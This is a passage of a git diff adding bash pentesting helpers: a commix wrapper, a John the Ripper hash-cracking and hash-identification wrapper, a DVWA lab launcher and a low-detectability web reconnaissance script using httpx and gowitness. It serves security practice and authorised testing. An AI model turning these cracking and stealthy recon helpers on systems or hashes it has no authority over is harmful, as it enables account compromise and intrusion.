|
||||||
|
screenshot|ss)
|
||||||
|
[[ -z "${2:-}" ]] && show_usage && exit 1
|
||||||
|
take_screenshot "$2" "${3:-evidence}"
|
||||||
|
;;
|
||||||
|
report)
|
||||||
|
[[ -z "${2:-}" ]] || [[ -z "${3:-}" ]] && show_usage && exit 1
|
||||||
|
generate_report "$2" "$3"
|
||||||
|
;;
|
||||||
|
status)
|
||||||
|
[[ -z "${2:-}" ]] && show_usage && exit 1
|
||||||
|
show_status "$2"
|
||||||
|
;;
|
||||||
|
*)
|
||||||
|
show_usage
|
||||||
|
exit 1
|
||||||
|
;;
|
||||||
|
esac
|
||||||
14
scripts/pentesting/commix
Executable file
14
scripts/pentesting/commix
Executable file
|
|
@ -0,0 +1,14 @@
|
||||||
|
#!/usr/bin/env bash
|
||||||
|
# Wrapper for commix (command injection testing tool)
|
||||||
|
# Routes to the correct commix installation
|
||||||
|
|
||||||
|
COMMIX_PATH="/home/e/commix/commix.py"
|
||||||
|
|
||||||
|
if [[ ! -f "$COMMIX_PATH" ]]; then
|
||||||
|
echo "Error: commix not found at $COMMIX_PATH" >&2
|
||||||
|
echo "Install with: git clone https://github.com/commixproject/commix.git /home/e/commix" >&2
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Execute commix with python3
|
||||||
|
exec python3 "$COMMIX_PATH" "$@"
|
||||||
274
scripts/pentesting/crack
Executable file
274
scripts/pentesting/crack
Executable file
|
|
@ -0,0 +1,274 @@
|
||||||
|
#!/usr/bin/env bash
|
||||||
|
set -euo pipefail
|
||||||
|
|
||||||
|
# Script Name: crack
|
||||||
|
# Description: Hash cracking helper (john/hashcat wrapper)
|
||||||
|
# Usage: crack <hashfile> # Auto-detect and crack
|
||||||
|
# crack <hashfile> -w wordlist # Specify wordlist
|
||||||
|
# crack <hashfile> -m md5 # Specify hash type
|
||||||
|
# crack identify <hash> # Identify hash type
|
||||||
|
|
||||||
|
VERSION="1.0.0"
|
||||||
|
|
||||||
|
# Colors
|
||||||
|
readonly RED='\033[0;31m'
|
||||||
|
readonly GREEN='\033[0;32m'
|
||||||
|
readonly YELLOW='\033[1;33m'
|
||||||
|
readonly BLUE='\033[0;34m'
|
||||||
|
readonly CYAN='\033[0;36m'
|
||||||
|
readonly MAGENTA='\033[0;35m'
|
||||||
|
readonly BOLD='\033[1m'
|
||||||
|
readonly NC='\033[0m'
|
||||||
|
|
||||||
|
show_help() {
|
||||||
|
echo -e "${BOLD}crack${NC} - Hash Cracking Helper v${VERSION}"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}USAGE:${NC}"
|
||||||
|
echo " crack <hashfile> [OPTIONS]"
|
||||||
|
echo " crack identify <hash>"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}COMMANDS:${NC}"
|
||||||
|
echo -e " ${CYAN}crack <file>${NC} Crack hashes in file"
|
||||||
|
echo -e " ${CYAN}identify <hash>${NC} Identify hash type"
|
||||||
|
echo -e " ${CYAN}show <file>${NC} Show cracked passwords"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}OPTIONS:${NC}"
|
||||||
|
echo -e " ${CYAN}-w, --wordlist FILE${NC} Specify wordlist"
|
||||||
|
echo -e " ${CYAN}-m, --mode TYPE${NC} Hash type (md5, sha1, sha256, ntlm, etc.)"
|
||||||
|
echo -e " ${CYAN}-r, --rules${NC} Apply John rules"
|
||||||
|
echo -e " ${CYAN}-f, --format${NC} John format string"
|
||||||
|
echo -e " ${CYAN}-h, --help${NC} Show this help"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}EXAMPLES:${NC}"
|
||||||
|
echo " crack hashes.txt # Auto crack with default wordlist"
|
||||||
|
echo " crack hashes.txt -w rockyou.txt # Use specific wordlist"
|
||||||
|
echo " crack hashes.txt -m md5 # Specify MD5 hashes"
|
||||||
|
echo " crack identify 5f4dcc3b5aa765d61d8327deb882cf99"
|
||||||
|
echo " crack show hashes.txt # Show cracked results"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}COMMON HASH TYPES:${NC}"
|
||||||
|
echo " md5, sha1, sha256, sha512"
|
||||||
|
echo " ntlm, mssql, mysql"
|
||||||
|
echo " bcrypt, des, raw-md5"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}INSTALLED TOOLS:${NC}"
|
||||||
|
command -v john &>/dev/null && echo -e " ${GREEN}✓${NC} john (John the Ripper)" || echo -e " ${RED}✗${NC} john (install: sudo apt install john)"
|
||||||
|
command -v hashcat &>/dev/null && echo -e " ${GREEN}✓${NC} hashcat" || echo -e " ${RED}✗${NC} hashcat (install: sudo apt install hashcat)"
|
||||||
|
command -v hashid &>/dev/null && echo -e " ${GREEN}✓${NC} hashid (hash identifier)" || echo -e " ${RED}✗${NC} hashid (install: pip install hashid)"
|
||||||
|
}
|
||||||
|
|
||||||
|
# Detect available tools
|
||||||
|
get_cracker() {
|
||||||
|
if command -v john &>/dev/null; then
|
||||||
|
echo "john"
|
||||||
|
elif command -v hashcat &>/dev/null; then
|
||||||
|
echo "hashcat"
|
||||||
|
else
|
||||||
|
echo -e "${RED}Error:${NC} No hash cracker found" >&2
|
||||||
|
echo "Install one: sudo apt install john hashcat" >&2
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
# Identify hash type
|
||||||
|
identify_hash() {
|
||||||
|
local hash="$1"
|
||||||
|
|
||||||
|
echo -e "${CYAN}[*]${NC} Identifying hash: ${BOLD}$hash${NC}"
|
||||||
|
echo
|
||||||
|
|
||||||
|
if command -v hashid &>/dev/null; then
|
||||||
|
hashid "$hash"
|
||||||
|
else
|
||||||
|
# Manual identification based on length
|
||||||
|
local len=${#hash}
|
||||||
|
|
||||||
|
echo -e "${YELLOW}Hash Identification:${NC}"
|
||||||
|
case "$len" in
|
||||||
|
32)
|
||||||
|
echo " Possible: MD5, NTLM"
|
||||||
|
echo " John format: --format=raw-md5 or --format=nt"
|
||||||
|
echo " Hashcat mode: -m 0 (MD5) or -m 1000 (NTLM)"
|
||||||
|
;;
|
||||||
|
40)
|
||||||
|
echo " Possible: SHA1"
|
||||||
|
echo " John format: --format=raw-sha1"
|
||||||
|
echo " Hashcat mode: -m 100"
|
||||||
|
;;
|
||||||
|
64)
|
||||||
|
echo " Possible: SHA256, SHA3-256"
|
||||||
|
echo " John format: --format=raw-sha256"
|
||||||
|
echo " Hashcat mode: -m 1400"
|
||||||
|
;;
|
||||||
|
128)
|
||||||
|
echo " Possible: SHA512"
|
||||||
|
echo " John format: --format=raw-sha512"
|
||||||
|
echo " Hashcat mode: -m 1700"
|
||||||
|
;;
|
||||||
|
60)
|
||||||
|
if [[ "$hash" =~ ^\$2[ayb]\$ ]]; then
|
||||||
|
echo " Identified: bcrypt"
|
||||||
|
echo " John format: --format=bcrypt"
|
||||||
|
echo " Hashcat mode: -m 3200"
|
||||||
|
fi
|
||||||
|
;;
|
||||||
|
*)
|
||||||
|
echo " Unknown hash type (length: $len)"
|
||||||
|
echo " Try: hashid '$hash'"
|
||||||
|
;;
|
||||||
|
esac
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
# Find common wordlists
|
||||||
|
find_wordlist() {
|
||||||
|
local wordlists=(
|
||||||
|
"/usr/share/wordlists/rockyou.txt"
|
||||||
|
"/usr/share/wordlists/rockyou.txt.gz"
|
||||||
|
"/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt"
|
||||||
|
"/usr/share/dict/words"
|
||||||
|
)
|
||||||
|
|
||||||
|
for wordlist in "${wordlists[@]}"; do
|
||||||
|
if [[ -f "$wordlist" ]]; then
|
||||||
|
echo "$wordlist"
|
||||||
|
return 0
|
||||||
|
fi
|
||||||
|
done
|
||||||
|
|
||||||
|
echo ""
|
||||||
|
}
|
||||||
|
|
||||||
|
# Crack with John the Ripper
|
||||||
|
crack_john() {
|
||||||
|
local hashfile="$1"
|
||||||
|
local format="${2:-}"
|
||||||
|
local wordlist="${3:-}"
|
||||||
|
local rules="${4:-false}"
|
||||||
|
|
||||||
|
echo -e "${CYAN}[*]${NC} Using John the Ripper"
|
||||||
|
echo -e "${CYAN}[*]${NC} Hash file: $hashfile"
|
||||||
|
|
||||||
|
local john_args=""
|
||||||
|
|
||||||
|
if [[ -n "$format" ]]; then
|
||||||
|
john_args="$john_args --format=$format"
|
||||||
|
echo -e "${CYAN}[*]${NC} Format: $format"
|
||||||
|
fi
|
||||||
|
|
||||||
|
if [[ -n "$wordlist" ]]; then
|
||||||
|
if [[ "$wordlist" == *.gz ]]; then
|
||||||
|
echo -e "${CYAN}[*]${NC} Wordlist: $wordlist (gzipped)"
|
||||||
|
john_args="$john_args --wordlist=<(zcat $wordlist)"
|
||||||
|
else
|
||||||
|
echo -e "${CYAN}[*]${NC} Wordlist: $wordlist"
|
||||||
|
john_args="$john_args --wordlist=$wordlist"
|
||||||
|
fi
|
||||||
|
else
|
||||||
|
auto_wordlist=$(find_wordlist)
|
||||||
|
if [[ -n "$auto_wordlist" ]]; then
|
||||||
|
echo -e "${CYAN}[*]${NC} Using default wordlist: $auto_wordlist"
|
||||||
|
john_args="$john_args --wordlist=$auto_wordlist"
|
||||||
|
fi
|
||||||
|
fi
|
||||||
|
|
||||||
|
if [[ "$rules" == "true" ]]; then
|
||||||
|
john_args="$john_args --rules"
|
||||||
|
echo -e "${CYAN}[*]${NC} Rules: enabled"
|
||||||
|
fi
|
||||||
|
|
||||||
|
echo
|
||||||
|
echo -e "${GREEN}[*]${NC} Starting crack..."
|
||||||
|
echo
|
||||||
|
|
||||||
|
john $john_args "$hashfile"
|
||||||
|
}
|
||||||
|
|
||||||
|
# Show cracked passwords
|
||||||
|
show_cracked() {
|
||||||
|
local hashfile="$1"
|
||||||
|
|
||||||
|
echo -e "${CYAN}[*]${NC} Cracked passwords for: ${BOLD}$hashfile${NC}"
|
||||||
|
echo
|
||||||
|
|
||||||
|
if command -v john &>/dev/null; then
|
||||||
|
john --show "$hashfile"
|
||||||
|
else
|
||||||
|
echo -e "${RED}Error:${NC} John not available"
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
# Parse arguments
|
||||||
|
if [[ $# -eq 0 ]] || [[ "$1" =~ ^(-h|--help|help)$ ]]; then
|
||||||
|
show_help
|
||||||
|
exit 0
|
||||||
|
fi
|
||||||
|
|
||||||
|
command="$1"
|
||||||
|
shift
|
||||||
|
|
||||||
|
case "$command" in
|
||||||
|
identify|id)
|
||||||
|
if [[ $# -lt 1 ]]; then
|
||||||
|
echo -e "${RED}Error:${NC} Usage: crack identify <hash>"
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
identify_hash "$1"
|
||||||
|
;;
|
||||||
|
show)
|
||||||
|
if [[ $# -lt 1 ]]; then
|
||||||
|
echo -e "${RED}Error:${NC} Usage: crack show <hashfile>"
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
show_cracked "$1"
|
||||||
|
;;
|
||||||
|
*)
|
||||||
|
# Assume first arg is hashfile
|
||||||
|
hashfile="$command"
|
||||||
|
|
||||||
|
if [[ ! -f "$hashfile" ]]; then
|
||||||
|
echo -e "${RED}Error:${NC} Hash file not found: $hashfile"
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Parse crack options
|
||||||
|
format=""
|
||||||
|
wordlist=""
|
||||||
|
rules=false
|
||||||
|
|
||||||
|
while [[ $# -gt 0 ]]; do
|
||||||
|
case $1 in
|
||||||
|
-w|--wordlist)
|
||||||
|
wordlist="$2"
|
||||||
|
shift 2
|
||||||
|
;;
|
||||||
|
-m|--mode|-f|--format)
|
||||||
|
format="$2"
|
||||||
|
shift 2
|
||||||
|
;;
|
||||||
|
-r|--rules)
|
||||||
|
rules=true
|
||||||
|
shift
|
||||||
|
;;
|
||||||
|
*)
|
||||||
|
echo -e "${RED}Error:${NC} Unknown option: $1"
|
||||||
|
exit 1
|
||||||
|
;;
|
||||||
|
esac
|
||||||
|
done
|
||||||
|
|
||||||
|
cracker=$(get_cracker)
|
||||||
|
|
||||||
|
case "$cracker" in
|
||||||
|
john)
|
||||||
|
crack_john "$hashfile" "$format" "$wordlist" "$rules"
|
||||||
|
;;
|
||||||
|
hashcat)
|
||||||
|
echo -e "${YELLOW}⚠${NC} Hashcat support not yet implemented"
|
||||||
|
echo "Use John the Ripper or implement hashcat wrapper"
|
||||||
|
exit 1
|
||||||
|
;;
|
||||||
|
esac
|
||||||
|
;;
|
||||||
|
esac
|
||||||
184
scripts/pentesting/dvwa
Executable file
184
scripts/pentesting/dvwa
Executable file
|
|
@ -0,0 +1,184 @@
|
||||||
|
#!/usr/bin/env bash
|
||||||
|
set -euo pipefail
|
||||||
|
|
||||||
|
# Script Name: dvwa
|
||||||
|
# Description: Damn Vulnerable Web Application launcher
|
||||||
|
# Usage: dvwa start|stop|status|logs
|
||||||
|
|
||||||
|
VERSION="1.0.0"
|
||||||
|
|
||||||
|
# Colors
|
||||||
|
readonly RED='\033[0;31m'
|
||||||
|
readonly GREEN='\033[0;32m'
|
||||||
|
readonly YELLOW='\033[1;33m'
|
||||||
|
readonly CYAN='\033[0;36m'
|
||||||
|
readonly BOLD='\033[1m'
|
||||||
|
readonly NC='\033[0m'
|
||||||
|
|
||||||
|
CONTAINER_NAME="dvwa"
|
||||||
|
IMAGE="vulnerables/web-dvwa"
|
||||||
|
DEFAULT_PORT="8080"
|
||||||
|
|
||||||
|
# Find available port
|
||||||
|
find_available_port() {
|
||||||
|
local port="${1:-8080}"
|
||||||
|
while lsof -Pi :$port -sTCP:LISTEN -t >/dev/null 2>&1 || sudo netstat -tuln | grep -q ":$port "; do
|
||||||
|
echo -e "${YELLOW}⚠${NC} Port $port in use, trying next..." >&2
|
||||||
|
port=$((port + 1))
|
||||||
|
done
|
||||||
|
echo "$port"
|
||||||
|
}
|
||||||
|
|
||||||
|
show_help() {
|
||||||
|
echo -e "${BOLD}dvwa${NC} - DVWA Launcher v${VERSION}"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}USAGE:${NC}"
|
||||||
|
echo " dvwa <command>"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}COMMANDS:${NC}"
|
||||||
|
echo -e " ${CYAN}start${NC} Start DVWA"
|
||||||
|
echo -e " ${CYAN}stop${NC} Stop DVWA"
|
||||||
|
echo -e " ${CYAN}restart${NC} Restart DVWA"
|
||||||
|
echo -e " ${CYAN}status${NC} Check if running"
|
||||||
|
echo -e " ${CYAN}logs${NC} Show container logs"
|
||||||
|
echo -e " ${CYAN}shell${NC} Open shell in container"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}EXAMPLES:${NC}"
|
||||||
|
echo " dvwa start # Launch DVWA"
|
||||||
|
echo " dvwa stop # Stop DVWA"
|
||||||
|
echo " dvwa logs # View logs"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}ACCESS:${NC}"
|
||||||
|
echo " URL: ${BOLD}http://localhost:\$PORT${NC} (default: 8080, auto-detects if in use)"
|
||||||
|
echo " Username: ${BOLD}admin${NC}"
|
||||||
|
echo " Password: ${BOLD}password${NC}"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}SETUP:${NC}"
|
||||||
|
echo " 1. Navigate to http://localhost"
|
||||||
|
echo " 2. Click 'Create / Reset Database' button"
|
||||||
|
echo " 3. Login with admin/password"
|
||||||
|
echo " 4. Set Security Level (low/medium/high/impossible)"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}ABOUT:${NC}"
|
||||||
|
echo " DVWA - Damn Vulnerable Web Application"
|
||||||
|
echo " Perfect for testing: SQLi, XSS, CSRF, Command Injection, etc."
|
||||||
|
echo " Docs: https://github.com/digininja/DVWA"
|
||||||
|
}
|
||||||
|
|
||||||
|
check_docker() {
|
||||||
|
if ! command -v docker &>/dev/null; then
|
||||||
|
echo -e "${RED}Error:${NC} Docker not installed"
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
start_dvwa() {
|
||||||
|
# Find available port only when starting
|
||||||
|
PORT=$(find_available_port "$DEFAULT_PORT")
|
||||||
|
|
||||||
|
if docker ps -a --format '{{.Names}}' | grep -q "^${CONTAINER_NAME}$"; then
|
||||||
|
if docker ps --format '{{.Names}}' | grep -q "^${CONTAINER_NAME}$"; then
|
||||||
|
echo -e "${YELLOW}⚠${NC} DVWA already running"
|
||||||
|
CURRENT_PORT=$(docker port "$CONTAINER_NAME" 80 2>/dev/null | cut -d: -f2)
|
||||||
|
echo -e "${CYAN}[*]${NC} Access at: ${BOLD}http://localhost:${CURRENT_PORT}${NC}"
|
||||||
|
return 0
|
||||||
|
else
|
||||||
|
echo -e "${CYAN}[*]${NC} Starting existing container..."
|
||||||
|
docker start "$CONTAINER_NAME"
|
||||||
|
fi
|
||||||
|
else
|
||||||
|
echo -e "${CYAN}[*]${NC} Pulling ${IMAGE}..."
|
||||||
|
docker pull "$IMAGE"
|
||||||
|
echo -e "${CYAN}[*]${NC} Starting DVWA..."
|
||||||
|
docker run -d --name "$CONTAINER_NAME" -p "${PORT}:80" "$IMAGE"
|
||||||
|
fi
|
||||||
|
|
||||||
|
echo -e "${GREEN}✓${NC} DVWA started"
|
||||||
|
if [[ "$PORT" != "$DEFAULT_PORT" ]]; then
|
||||||
|
echo -e "${YELLOW}⚠${NC} Using port ${PORT} (default ${DEFAULT_PORT} was in use)"
|
||||||
|
fi
|
||||||
|
echo -e "${CYAN}[*]${NC} Access at: ${BOLD}http://localhost:${PORT}${NC}"
|
||||||
|
echo -e "${CYAN}[*]${NC} Login: ${BOLD}admin / password${NC}"
|
||||||
|
echo
|
||||||
|
echo -e "${YELLOW}Note:${NC} First time? Click 'Create / Reset Database' at the bottom"
|
||||||
|
}
|
||||||
|
|
||||||
|
stop_dvwa() {
|
||||||
|
if docker ps --format '{{.Names}}' | grep -q "^${CONTAINER_NAME}$"; then
|
||||||
|
echo -e "${CYAN}[*]${NC} Stopping DVWA..."
|
||||||
|
docker stop "$CONTAINER_NAME"
|
||||||
|
echo -e "${GREEN}✓${NC} DVWA stopped"
|
||||||
|
else
|
||||||
|
echo -e "${YELLOW}⚠${NC} DVWA not running"
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
restart_dvwa() {
|
||||||
|
stop_dvwa
|
||||||
|
sleep 2
|
||||||
|
start_dvwa
|
||||||
|
}
|
||||||
|
|
||||||
|
show_status() {
|
||||||
|
if docker ps --format '{{.Names}}' | grep -q "^${CONTAINER_NAME}$"; then
|
||||||
|
echo -e "${GREEN}●${NC} DVWA is ${GREEN}running${NC}"
|
||||||
|
CURRENT_PORT=$(docker port "$CONTAINER_NAME" 80 2>/dev/null | cut -d: -f2)
|
||||||
|
echo -e "${CYAN}[*]${NC} Access at: ${BOLD}http://localhost:${CURRENT_PORT}${NC}"
|
||||||
|
echo -e "${CYAN}[*]${NC} Login: ${BOLD}admin / password${NC}"
|
||||||
|
docker ps --format "table {{.Names}}\t{{.Status}}\t{{.Ports}}" | grep -E "(NAMES|${CONTAINER_NAME})"
|
||||||
|
else
|
||||||
|
echo -e "${RED}●${NC} DVWA is ${RED}stopped${NC}"
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
show_logs() {
|
||||||
|
if docker ps --format '{{.Names}}' | grep -q "^${CONTAINER_NAME}$"; then
|
||||||
|
docker logs -f "$CONTAINER_NAME"
|
||||||
|
else
|
||||||
|
echo -e "${RED}Error:${NC} DVWA not running"
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
open_shell() {
|
||||||
|
if docker ps --format '{{.Names}}' | grep -q "^${CONTAINER_NAME}$"; then
|
||||||
|
docker exec -it "$CONTAINER_NAME" /bin/bash
|
||||||
|
else
|
||||||
|
echo -e "${RED}Error:${NC} DVWA not running"
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
# Main
|
||||||
|
check_docker
|
||||||
|
|
||||||
|
if [[ $# -eq 0 ]] || [[ "$1" =~ ^(-h|--help|help)$ ]]; then
|
||||||
|
show_help
|
||||||
|
exit 0
|
||||||
|
fi
|
||||||
|
|
||||||
|
case "$1" in
|
||||||
|
start|up)
|
||||||
|
start_dvwa
|
||||||
|
;;
|
||||||
|
stop|down)
|
||||||
|
stop_dvwa
|
||||||
|
;;
|
||||||
|
restart)
|
||||||
|
restart_dvwa
|
||||||
|
;;
|
||||||
|
status)
|
||||||
|
show_status
|
||||||
|
;;
|
||||||
|
logs)
|
||||||
|
show_logs
|
||||||
|
;;
|
||||||
|
shell|sh|bash)
|
||||||
|
open_shell
|
||||||
|
;;
|
||||||
|
*)
|
||||||
|
echo -e "${RED}Error:${NC} Unknown command: $1"
|
||||||
|
echo "Run 'dvwa --help' for usage"
|
||||||
|
exit 1
|
||||||
|
;;
|
||||||
|
esac
|
||||||
233
scripts/pentesting/light-recon
Executable file
233
scripts/pentesting/light-recon
Executable file
|
|
@ -0,0 +1,233 @@
|
||||||
|
#!/usr/bin/env bash
|
||||||
|
set -euo pipefail
|
||||||
|
|
||||||
|
# Script Name: light-recon
|
||||||
|
# Description: Light web reconnaissance (browser-like, low detectability)
|
||||||
|
# Usage: light-recon <url>
|
||||||
|
# Tier 2: Between passive and active - mimics normal browsing
|
||||||
|
|
||||||
|
VERSION="1.0.0"
|
||||||
|
|
||||||
|
# Colors
|
||||||
|
readonly RED='\033[0;31m'
|
||||||
|
readonly GREEN='\033[0;32m'
|
||||||
|
readonly YELLOW='\033[1;33m'
|
||||||
|
readonly BLUE='\033[0;34m'
|
||||||
|
readonly CYAN='\033[0;36m'
|
||||||
|
readonly MAGENTA='\033[0;35m'
|
||||||
|
readonly BOLD='\033[1m'
|
||||||
|
readonly NC='\033[0m'
|
||||||
|
|
||||||
|
# Status indicators
|
||||||
|
readonly GREENPLUS="${GREEN}[+]${NC}"
|
||||||
|
readonly GREENSTAR="${YELLOW}[*]${NC}"
|
||||||
|
readonly REDMINUS="${RED}[-]${NC}"
|
||||||
|
readonly REDEXCLAIM="${RED}[!]${NC}"
|
||||||
|
|
||||||
|
show_help() {
|
||||||
|
echo -e "${BOLD}light-recon${NC} - Light Web Reconnaissance v${VERSION}"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}USAGE:${NC}"
|
||||||
|
echo " light-recon <url>"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}DESCRIPTION:${NC}"
|
||||||
|
echo " Browser-like reconnaissance with low detectability"
|
||||||
|
echo " Creates tmux window with 3 panes:"
|
||||||
|
echo " - Pane 1 (left): httpx (HTTP probing with tech detection)"
|
||||||
|
echo " - Pane 2 (top-right): gowitness (visual screenshots)"
|
||||||
|
echo " - Pane 3 (bottom-right): results dashboard"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}WHAT IS LIGHT RECON?${NC}"
|
||||||
|
echo " ✓ HTTP/HTTPS probing (looks like normal browser request)"
|
||||||
|
echo " ✓ Screenshot capture (headless browser)"
|
||||||
|
echo " ✓ Technology fingerprinting (Wappalyzer-style)"
|
||||||
|
echo " ✓ Security headers analysis"
|
||||||
|
echo " ✓ SSL/TLS information"
|
||||||
|
echo " ✓ Redirect chain following"
|
||||||
|
echo
|
||||||
|
echo " ✗ No directory brute-forcing"
|
||||||
|
echo " ✗ No vulnerability scanning"
|
||||||
|
echo " ✗ No aggressive crawling"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}EXAMPLES:${NC}"
|
||||||
|
echo " light-recon http://target.htb"
|
||||||
|
echo " light-recon https://example.com"
|
||||||
|
echo " light-recon 10.10.10.5"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}OUTPUT:${NC}"
|
||||||
|
echo " All results saved to: ./light-recon-<target>-<timestamp>/"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}DETECTABILITY:${NC}"
|
||||||
|
echo " 🟡 Low - Appears as normal browser traffic"
|
||||||
|
echo " Safe for bug bounty initial recon phase"
|
||||||
|
echo " Use before aggressive scanning (web-recon)"
|
||||||
|
}
|
||||||
|
|
||||||
|
# Check required tools
|
||||||
|
check_tools() {
|
||||||
|
local missing=()
|
||||||
|
local optional_missing=()
|
||||||
|
|
||||||
|
# Core tools
|
||||||
|
command -v tmux &>/dev/null || missing+=("tmux")
|
||||||
|
|
||||||
|
# Light recon tools (all optional but warn)
|
||||||
|
command -v httpx &>/dev/null || optional_missing+=("httpx")
|
||||||
|
command -v gowitness &>/dev/null || optional_missing+=("gowitness")
|
||||||
|
|
||||||
|
if [[ ${#missing[@]} -gt 0 ]]; then
|
||||||
|
echo -e "${RED}Error:${NC} Missing required tools: ${missing[*]}"
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
if [[ ${#optional_missing[@]} -gt 0 ]]; then
|
||||||
|
echo -e "${YELLOW}⚠${NC} Optional tools missing (scans will be skipped): ${optional_missing[*]}"
|
||||||
|
echo -e "${CYAN}Install with:${NC}"
|
||||||
|
for tool in "${optional_missing[@]}"; do
|
||||||
|
case "$tool" in
|
||||||
|
httpx) echo " go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest" ;;
|
||||||
|
gowitness) echo " go install github.com/sensepost/gowitness@latest" ;;
|
||||||
|
esac
|
||||||
|
done
|
||||||
|
echo
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
# Create output directory
|
||||||
|
setup_output_dir() {
|
||||||
|
local url="$1"
|
||||||
|
local timestamp=$(date +%Y%m%d-%H%M%S)
|
||||||
|
local clean_url=$(echo "$url" | tr '/:' '_' | tr -d 'http')
|
||||||
|
|
||||||
|
OUTPUT_DIR="light-recon-${clean_url}-${timestamp}"
|
||||||
|
mkdir -p "$OUTPUT_DIR"
|
||||||
|
mkdir -p "$OUTPUT_DIR/screenshots"
|
||||||
|
|
||||||
|
echo -e "${GREEN}✓${NC} Output directory: ${BOLD}$OUTPUT_DIR${NC}"
|
||||||
|
}
|
||||||
|
|
||||||
|
# Main light-recon function
|
||||||
|
run_light_recon() {
|
||||||
|
local url="$1"
|
||||||
|
|
||||||
|
# Ensure URL has http:// or https://
|
||||||
|
if [[ ! "$url" =~ ^https?:// ]]; then
|
||||||
|
url="http://$url"
|
||||||
|
echo -e "${YELLOW}⚠${NC} No protocol specified, using: $url"
|
||||||
|
fi
|
||||||
|
|
||||||
|
echo -e "${CYAN}${BOLD}"
|
||||||
|
echo "╔════════════════════════════════════════════════════════════╗"
|
||||||
|
echo "║ Light Web Reconnaissance (Browser-Like) ║"
|
||||||
|
echo "║ Target: $url"
|
||||||
|
echo "╚════════════════════════════════════════════════════════════╝"
|
||||||
|
echo -e "${NC}"
|
||||||
|
|
||||||
|
# Create output directory
|
||||||
|
setup_output_dir "$url"
|
||||||
|
|
||||||
|
# Check if in tmux
|
||||||
|
if [[ -z "${TMUX:-}" ]]; then
|
||||||
|
echo -e "${YELLOW}⚠${NC} Not in tmux session - running sequentially"
|
||||||
|
run_scans_sequential "$url"
|
||||||
|
return
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Create tmux window with 3 panes
|
||||||
|
WINDOW_NAME="--> Light: ${url:0:20}... <--"
|
||||||
|
tmux new-window -n "$WINDOW_NAME"
|
||||||
|
|
||||||
|
# Create layout: [Left wide] [Right split top/bottom]
|
||||||
|
# With 3 panes, tmux uses different numbering than 4-pane layouts
|
||||||
|
# After splits: [0: left-wide] [1: top-right] [2: bottom-right]
|
||||||
|
|
||||||
|
# Split horizontally (left | right)
|
||||||
|
tmux split-window -h
|
||||||
|
|
||||||
|
# Split right pane vertically
|
||||||
|
tmux select-pane -t 1
|
||||||
|
tmux split-window -v
|
||||||
|
|
||||||
|
# Resize left pane to be wider (60/40 split)
|
||||||
|
tmux select-pane -t 0
|
||||||
|
tmux resize-pane -R 30
|
||||||
|
|
||||||
|
# Final 3-pane layout:
|
||||||
|
# 0 (left-wide) 1 (top-right)
|
||||||
|
# 2 (bottom-right)
|
||||||
|
|
||||||
|
# Pane 0 (left): httpx - comprehensive HTTP probing
|
||||||
|
tmux select-pane -t 0
|
||||||
|
if command -v httpx &>/dev/null; then
|
||||||
|
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Starting httpx HTTP probing...${NC}' && echo '$url' | httpx -silent -title -tech-detect -status-code -content-length -web-server -method -ip -cname -cdn -follow-redirects -tls-probe -pipeline -json -o httpx-detailed.json 2>&1 | tee httpx.log && echo '$url' | httpx -silent -sc -title -tech-detect -web-server -ip -location -cdn -o httpx-summary.txt && echo -e '${GREEN}✓ httpx complete${NC}' && echo && echo -e '${CYAN}Summary:${NC}' && cat httpx-summary.txt" C-m
|
||||||
|
else
|
||||||
|
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${YELLOW}⚠ httpx not installed - skipping${NC}'" C-m
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Pane 1 (top-right): gowitness - screenshot capture
|
||||||
|
tmux select-pane -t 1
|
||||||
|
if command -v gowitness &>/dev/null; then
|
||||||
|
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Starting gowitness screenshot capture...${NC}' && gowitness single '$url' --screenshot-path=./screenshots/ --disable-logging --timeout 30 2>&1 | tee gowitness.log && echo -e '${GREEN}✓ gowitness complete${NC}' && echo && ls -lh screenshots/ | tail -5" C-m
|
||||||
|
else
|
||||||
|
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${YELLOW}⚠ gowitness not installed - skipping${NC}'" C-m
|
||||||
|
fi
|
||||||
|
|
||||||
|
